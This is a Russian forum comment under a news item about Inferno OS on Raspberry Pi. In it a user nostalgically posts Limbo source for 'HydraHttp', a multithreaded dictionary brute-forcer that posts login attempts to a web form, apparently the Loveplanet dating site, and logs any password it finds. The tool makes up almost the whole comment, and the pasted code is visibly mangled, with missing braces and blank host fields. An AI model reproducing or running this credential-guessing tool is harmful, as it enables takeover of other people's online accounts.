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"Релиз операционной системы Inferno 0.6 для Raspberry Pi"
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. "Релиз операционной системы Inferno 0.6 для Raspberry Pi" –4 +/
Сообщение от proud_anon (?), 11-Фев-16, 08:51 
эх, молодость...
implement HydraHttp;

include "sys.m";
    sys: Sys;
    Connection: import sys;    
include "draw.m";
include "bufio.m";
    bufio: Bufio;
    Iobuf: import bufio;
include "arg.m";
    arg: Arg;

HydraHttp: module {
    init: fn(ctx: ref Draw->Context, argv: list of string);

login: string;
wordfile: string;
logfile: string;

logfile = "loveplanet.log";
host := "";
port := "80";
runtr := 2;

SIG_EXIT:     con 0;
SIG_LOST:  con 1;
SIG_FOUND: con 4;
SIG_EMPTY: con 5;

iichan:     type chan of (int, int);
ilchan:     type chan of (int, list of string);
ischan:     type chan of (int, string);
lchan:    type chan of list of string;

totalwords: int;


init(nil: ref Draw->Context, argv: list of string){
    sys = load Sys Sys->PATH;
    bufio = load Bufio Bufio->PATH;
    arg = load Arg Arg->PATH;
    sync := chan of (int, int);
    state := chan of int;
    lflag := tflag := wflag := 0;

    arg->setusage("-l login -w wordlist -t [threads, 2 by default]");
    while((opt := arg->opt()) != 0){
        case opt{
            'l' =>
                login = arg->arg();
                lflag = 1;
            'w' =>
                wordfile = arg->arg();
                wflag = 1;
            't' =>
                runtr = int arg->arg();
                tflag = 1;
            * =>
                sys->print("unknown option: -%c\n", opt);
    if(!lflag || !wflag){
        sys->print("Not enough arguments\n");
    if(runtr < 1) { runtr = 1;}
    sys->print("Start job for login: %s dictionary: %s threards: %d\n", login , wordfile, runtr);
    pwdfeed := array[runtr] of chan of list of string;
    spawn master(sync, pwdfeed, state);

    (pid, signal) := <- sync;
    if(signal == SIG_EXIT) {
        sys->print("Could not run Master\n");
    sys->print("Master@[%d]\n", pid);
    for(i := 0; i < runtr; i++) {
        spawn slave(login, sync, pwdfeed[i] = chan of list of string, state);

master(sync: iichan, pwdfeed: array of lchan, state: chan of int){
    slaves: list of int;
    slavepid := array[runtr] of int;

    my_pid := mypid();
    dicfd := bufio->open(wordfile, Bufio->OREAD);
    if(dicfd == nil){
        sys->print("Wordlist fatal: %r\n");
        sync <- = (my_pid, SIG_EXIT);
    sync <- = (my_pid, SIG_CONTINUE);
    sig_state := SIG_CONTINUE;
            (pid, signal) := <- sync  =>
                case signal {
                    SIG_ANNOUNCE =>
                        sys->print("master <- announce[%d]\n", pid);
                        slaves = addpid(slaves, pid);
                        slavepid[i] =pid;
                    SIG_LOST =>
                        sys->print("master <- lost[%d]\n", pid);
                        slaves = delpid(slaves, pid);
                        if(totalpids(slaves) == 0){
                    SIG_FOUND =>
                        slaves = killallpid(slaves);
                        sys->print("master <- found[%d]\n", pid);
                    SIG_CONTINUE =>
                        (cnt, words) := wordsfeed(dicfd);
                        if(cnt > 0) {
                            num := len slavepid;
                            j := 0;
                            for(j =0; j<num; j++){
                                if(slavepid[j] == pid) {
                                    pwdfeed[j] <- = words;
                        } else {
                            slaves = delpid(slaves, pid);
                            sys->print("wordlist empty. abort\n");
                            sig_state = SIG_EXIT;
                            if(totalpids(slaves) ==0) { exit; }
                        sys->print("Words: %d\n", totalwords);
            state <- = sig_state  =>
                        if(sig_state == SIG_EXIT){
                            slaves = killallpid(slaves);
                            sys->print("Password not found\n");

slave(login: string, sync: iichan, pwdfeed: lchan, state: chan of int){
    net: Connection;
    words: list of string;
    ok: int;
    my_pid := mypid();
    sync <- =(my_pid, SIG_ANNOUNCE);
    sync <- =(my_pid, SIG_CONTINUE);
    words = <- pwdfeed;

    for(passwd := hd words; words != nil; words = tl words){
        passwd = hd words;    
    (ok, net) = sys->dial(netmkaddr(host, "tcp", port), nil);
    if(ok < 0){
        sys->print("HydraHttp[%d] fatal: %r\n", my_pid);
        sync <- = (my_pid, SIG_LOST);
#sys->print("Try %s %s\n", login, passwd);
    req := request(login, passwd);
    if(!httpreq(net.dfd, req, my_pid)) {
### Close TCP connection
### Send master fail signal
        net.dfd = nil;
        sync <- = (my_pid, SIG_LOST);    
    if(answer(net.dfd, my_pid)){
        sys->print("Found login: %s password: %s\n", login, passwd);
        tolog(login, passwd);
### Send master found signal
        sync <- = (my_pid, SIG_FOUND);

### disconnect from server
    net.dfd = nil;
    } ## for end
    signal := <- state ;
    if(signal != SIG_EXIT) {
        sync <- =(my_pid, SIG_CONTINUE);
        words = <- pwdfeed;
    else {
        sync <- = (my_pid, SIG_LOST);

wordsfeed(dicfd: ref Iobuf): (int, list of string){
    cnt := 20;                      ### lenght of wordfeed
    wordlist: list of string;
    while((s := dicfd.gets('\n')) !=nil ) {
        slen := (len s) -1;
        s = s[:slen];
#        s = urlencode(s);        ### Loveplanet holds latin charset
        wordlist = s :: wordlist;
        if(i == cnt)  { break; }
    return (i, wordlist);

urlencode(data: string) : string
    c, length, status : int;

    plain := array[127] of { 45=>'-', 46=>'.', 48=>'0', 49=>'1', 50=>'2', 51=>'3', 52=>'4', 53=>'5', 54=>'6', 55=>'7', 56=>'8', 57=>'9', 65=>'A', 66=>'B', 67=>'C', 68=>'D', 69=>'E', 70=>'F', 71=>'G', 72=>'H', 73=>'I', 74=>'J', 75=>'K', 76=>'L', 77=>'M', 78=>'N', 79=>'O', 80=>'P', 81=>'Q', 82=>'R', 83=>'S', 84=>'T', 85=>'U', 86=>'V', 87=>'W', 88=>'X', 89=>'Y', 90=>'Z', 95=>'_', 97=>'a', 98=>'b', 99=>'c', 100=>'d', 101=>'e', 102=>'f', 103=>'g', 104=>'h', 105=>'i', 106=>'j', 107=>'k', 108=>'l', 109=>'m', 110=>'n', 111=>'o', 112=>'p', 113=>'q', 114=>'r', 115=>'s', 116=>'t', 117=>'u', 118=>'v', 119=>'w', 120=>'x', 121=>'y', 122=>'z' , * => 0};

    bytes := array of byte data;
    encoded := "";
    i := 0;
    status = 1;

    while(i < len bytes && status != 0) {
        (c, length, status) = sys->byte2char(bytes, i);
        if(status > 0)
            if (c < len plain && plain[c] > 0)
                encoded += sys->sprint("%c", plain[c]);
                encoded += sys->sprint("%%%X", c);
        i += length;

    return encoded;

request(login, password: string): string{
    req, body: string;

    body = "a=logon&back=&login=" + login + "&password=" + password;
    req = "POST HTTP/1.1\r\n" +
        "Host:\r\n" +
        "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)\r\n" +
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +
        "Accept-Language: ru,en-us;q=0.7,en;q=0.3\r\n" +
        "Accept-Encoding: gzip,deflate\r\n" +
        "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +
        "Keep-Alive: 600\r\n" +
        "Connection: keep-alive\r\n" +
        "Referer:\r\n" +
        "Cookie: randomhit=712674716\r\n" +
        "Content-Type: application/x-www-form-urlencoded\r\n" +
        "Content-Length: " + string(len body) + "\r\n\r\n"+
        return req;

netmkaddr(addr, net, svc: string): string
    if(net == nil)
        net = "net";
    (n,nil) := sys->tokenize(addr,"!");
    if(n <= 1){
        if(svc == nil)
            return sys->sprint("%s!%s", net, addr);
        return sys->sprint("%s!%s!%s", net, addr, svc);
    if(svc == nil || n > 2)
        return addr;
        return sys->sprint("%s!%s", addr, svc);

httpreq(dfd: ref Sys->FD, s: string, pid: int): int{
    bytes := array of byte s;
    ok := sys->write(dfd, bytes, len bytes);
    if( ok == -1) {
        sys->print("HydraHttp[%d] fatal: could't write %r", pid);
        return 0;
    } else {return 1;}

answer(dfd: ref Sys->FD, pid: int): int{
    blen := 1024;
    flag := 0;
    buf := array[blen] of byte;
    num := sys->read(dfd, buf, blen);
    if(num >= blen) { num = blen;}
#    sys->print("[%d]: %s\n", pid, string buf[:num]);  ### print out full reply
#    sys->print("[%d]:(%d)\n", pid, num);         ### print only length of returned data
    if(num > 0) {
        flag = parsereply(string buf[:num]);
    else { flag = 0; }
    return flag;

parsereply(s: string): int{
    answl: list of string;
    line: string;
    num, flag: int;
    flag = 0;
    (num, answl) = sys->tokenize(s, "\r\n");
    if(num > 0){
        for(i:=0; i<num; i++){
            line = hd answl;
            case i {
                0 =>
                    if(line[0:7] == "HTTP/1.") {
                        if(line[9:15] == "302 Fo") {          ## # 302 Found
                            flag =1;
            answl = tl answl;
    return flag;

tolog(login, password: string){
    buf: array of byte;
    s: string;
    logfd := sys->create(logfile, Sys->OWRITE, 8r644);
    if(logfd == nil) {
        sys->print("Fatal: %r\n");
    s = "Found login: " + login + " password: " + password + "\n";
    buf = array of byte s;
    sys->write(logfd, buf, len buf);

### thread manager :-) ###

mypid(): int {
    return sys->pctl(0, nil);

addpid(cl: list of int, pid: int): list of int{
    cl = pid :: cl;
    return cl;

delpid(cl: list of int, pid: int): list of int {
    num := len cl;
    tmp: list of int;
    for(i:=0; i<num; i++){
        spid := hd cl;
        if(pid != spid){
            tmp = spid :: tmp;
        cl = tl cl;
    return tmp;

showpids(cl: list of int){
    if(isempty(cl)) { exit;}
    num := len cl;
    for(i:=0; i<num; i++){
        pid := hd cl;
        sys->print("%d,", pid);
        cl = tl cl;

killpid(pid: int){
    fd := sys->open("/prog/" + string pid + "/ctl", sys->OWRITE );
    sys->fprint(fd, "kill");

killallpid(cl: list of int): list of int{
    num := len cl;
    for(i:=0; i<num; i++){
        pid := hd cl;
        cl = tl cl;
    return cl;

isempty(cl: list of int): int{
    num := len cl;
    if(num == 0) { return 1; }
    else { return 0;}

totalpids(cl: list of int): int {
    return len cl;

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Релиз операционной системы Inferno 0.6 для Raspberry Pi, opennews, 10-Фев-16, 13:38  [смотреть все]
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